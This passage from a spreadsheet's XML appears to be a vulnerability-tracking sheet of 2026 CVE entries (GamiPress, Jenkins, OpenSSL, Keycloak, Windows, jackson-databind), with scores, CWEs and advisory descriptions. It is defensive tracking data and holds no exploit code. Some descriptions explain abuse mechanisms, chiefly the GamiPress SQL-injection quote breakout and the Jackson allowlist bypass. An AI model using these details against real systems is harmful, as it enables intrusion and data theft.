          <t>The GamiPress plugin for WordPress is vulnerable to authenticated (Subscriber+) SQL Injection via the 'q' parameter of the wpForo integration AJAX selector (action gamipress_wpforo_get_posts) in versions up to, and including, 7.9.7. The value is passed only through $wpdb-&gt;esc_like() and interpolated directly into a single-quoted LIKE clause with no %s placeholder. Because esc_like() runs after WordPress core magic quotes, it doubles the injected backslash (\' -&gt; \\'), which MySQL reads as one literal backslash followed by a live closing quote, allowing the attacker to break out of the string and inject boolean-based SQL. The wpForo plugin only needs to be active to register the callback; no wpForo vulnerability is used. Requires a Subscriber account, which can read the gamipress_admin nonce (exposed on every admin page, e.g. /wp-admin/profile.php). Note: the researcher's Simple:Press vectors (PoC 2 &amp; 3) do not reproduce in current code, which uses $wpdb-&gt;prepare() with %s placeholders; only the wpForo selector is confirmed.</t>
        </is>
      </c>
      <c r="S62" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15439</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54248</t>
        </is>
      </c>
      <c r="D63" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E63" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F63" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr"/>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr"/>
      <c r="Q63" s="5" t="inlineStr">
        <is>
          <t>CWE-347, CWE-501</t>
        </is>
      </c>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t>Doco-CD is</t>
        </is>
      </c>
      <c r="S63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54248</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78453</t>
        </is>
      </c>
      <c r="D64" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E64" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F64" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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4" s="5" t="inlineStr"/>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr"/>
      <c r="Q64" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78453</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84651</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K65" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr"/>
      <c r="Q65" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>In Jenkins 2.579 and earlier, LTS 2.568.2 and earlier, the REST API and CLI endpoints for updating agent configuration do not prevent a submitted configuration from overwriting a different agent by specifying that agent's name in the submitted XML document, allowing attackers with Agent/Configure permission on one agent to take over a different agent, gaining control of its configuration and obtaining access to its inbound agent secret and environment variables.</t>
        </is>
      </c>
      <c r="S65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84651</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81533</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K66" s="5" t="inlineStr">
        <is>
          <t>mongodb:bi_connector_odbc_driver</t>
        </is>
      </c>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr"/>
      <c r="Q66" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>An application using the MongoDB BI Connector ODBC Driver may encounter a memory-safety issue when a submitted SQL statement contains an unusually long run of digits following a LIMIT clause. The issue occurs only on connections where the driver's optional prefetch setting is enabled, and stems from the driver copying the digit sequence into a fixed-size internal buffer without checking its length. A user able to influence the numeric portion of a LIMIT clause could cause the hosting application process to terminate unexpectedly or corrupt adjacent memory in that process.</t>
        </is>
      </c>
      <c r="S66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81533</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63074</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K67" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr"/>
      <c r="Q67" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>Issue summary: The OpenSSL Certificate Management Protocol (CMP) caches
additional certificates (extraCerts) sent in a CMP message, but never expunges
them (for instance if they are invalid).  If a server reuses an OSSL_CMP_CTX
frequently, this cache of extraCerts may grow unboundedly, and a malicious
client may flood a CMP server with requests driving this growth.
Impact summary: Users utilizing a CMP server that reuses a single OSSL_CMP_CTX
for the lifetime of a server process may observe unbounded memory growth in the
event a malicious client repeatedly sends requests containing unique extra
certificates, which may lead to OOM conditions.
CWE: CWE-770: Allocation of Resources Without Limits or Throttling
Description: If a remote user sends CMP messages to a server with a list of
extraCerts and the message is rejected, the extraCerts from the message remains
in the server contexts untrusted certificate stack.  This exposes servers with
long lived ctx objects to Denial of Service attacks in which an attacker sends
messages intending to be rejected with a large list of additional certificates
repeatedly, forcing the server to store them indefinitely.
The issue was fixed by removing the added extra certs if the message is
rejected, using the same method as when the context is configured to not do
caching at all.
FIPS impact: no
As the CMP code lives outside the FIPS module boundary, no FIPS
modules are affected by this CVE.</t>
        </is>
      </c>
      <c r="S67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63074</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78454</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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 s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr"/>
      <c r="Q68" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78454</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86224</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr"/>
      <c r="Q69" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in SourceCodester Class and Exam Timetabling System 1.0. Affected is the function mysqli_query of the file /admin/modal_add_product.php. Executing a manipulation of the argument fname can lead to sql injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="S69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86224</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62088</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr">
        <is>
          <t>elastic</t>
        </is>
      </c>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr"/>
      <c r="Q70" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>Insertion of Sensitive Information Into Sent Data vulnerability in 10up ElasticPress allows Retrieve Embedded Sensitive Data.
This issue affects ElasticPress: from n/a through 5.3.4.</t>
        </is>
      </c>
      <c r="S70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62088</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78446</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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1" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr"/>
      <c r="Q71" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Distributed File System (DFS) allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78446</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89298</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr"/>
      <c r="Q72" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Dynamic Client Registration service of Keycloak, an open-source identity and access management solution. The issue occurs when a user with the view-clients role accesses the client registration endpoint to retrieve client details. Due to a failure to mask sensitive information, the service returns the client's confidential secret in cleartext. This could allow a read-only administrator to obtain full access to the affected client's account and potentially escalate their privileges within the realm.</t>
        </is>
      </c>
      <c r="S72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89298</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78452</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr"/>
      <c r="Q73" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="S73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78452</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78547</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>secure@citrix.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr"/>
      <c r="Q74" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write vulnerability in Citrix Citrix Workspace app for Windows.
This issue affects Citrix Workspace app for Windows: before 2603.11 Current Release (CR), before 2507.1 LTSR CU3, and before LTSR 2607.</t>
        </is>
      </c>
      <c r="S74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78547</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78455</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr"/>
      <c r="Q75" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Xbox allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="S75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78455</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84646</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K76" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr"/>
      <c r="Q76" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>In Jenkins 2.579 and earlier, LTS 2.568.2 and earlier, user objects can appear as nested field values in other deserialized XML objects, allowing attackers with Overall/Read permission to create user objects by submitting crafted XML.</t>
        </is>
      </c>
      <c r="S76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84646</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54513</t>
        </is>
      </c>
      <c r="D77" s="5" t="inlineStr"/>
      <c r="E77" s="5" t="inlineStr"/>
      <c r="F77" s="5" t="inlineStr"/>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr">
        <is>
          <t>jackson-databind, fasterxml</t>
        </is>
      </c>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr">
        <is>
          <t>maven:com.fasterxml.jackson.core:jackson-databind, maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M77" s="5" t="inlineStr">
        <is>
          <t>2.18.8, 2.21.4, 3.1.4</t>
        </is>
      </c>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr"/>
      <c r="P77" s="5" t="inlineStr"/>
      <c r="Q77" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>## Summary
`BasicPolymorphicTypeValidator.Builder.allowIfSubTypeIsArray()` allowlists any array type based only on `clazz.isArray()`, without validating the array's component (element) type against the configured allowlist. A PTV built with `allowIfSubTypeIsArray()` plus an explicit concrete-type allowlist therefore still permits `EvilType[]` even though `EvilType` is not allowlisted. When Jackson deserializes the elements and no per-element type IDs are present, it instantiates the component type directly with no further PTV check, bypassing the allowlist.
## Impact
Applications using `BasicPolymorphicTypeValidator` with `allowIfSubTypeIsArray()` as a safeguard get no protection for concrete array component types; an attacker controlling JSON can instantiate non-allowlisted types via an array wrapper, re-opening the gadget-instantiation risk PTV is meant to prevent.
## Affected / Patched (verified via `git tag --contains`)
- 2.18 line: `&gt;= 2.10.0, &lt; 2.18.8` -&gt; fixed in **2.18.8**
- 2.19-2.21 line: `&gt;= 2.19.0, &lt; 2.21.4` -&gt; fixed in **2.21.4**
- 3.x line: `&gt;= 3.0.0, &lt; 3.1.4` -&gt; fixed in **3.1.4**
`PolymorphicTypeValidator` was added in 2.10.0 so vulnerability N/A for versions prior to that.
## Severity / CWE
Maintainer: significant. Reporter: HIGH. CWE-184 (Incomplete List of Disallowed Inputs); related CWE-502.
## Upstream fix
FasterXML/jackson-databind#5981; fix PR #5983 (`24529da`), 2.18 backport PR #5984 (`01d1692`). Released 2026-06-04 in 2.18.8 / 2.21.4 / 3.1.4.
## Credits
Omkhar Arasaratnam (@omkhar) - finder.</t>
        </is>
      </c>
      <c r="S77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54513</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59971</t>
        </is>
      </c>
      <c r="D78" s="5" t="inlineStr"/>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
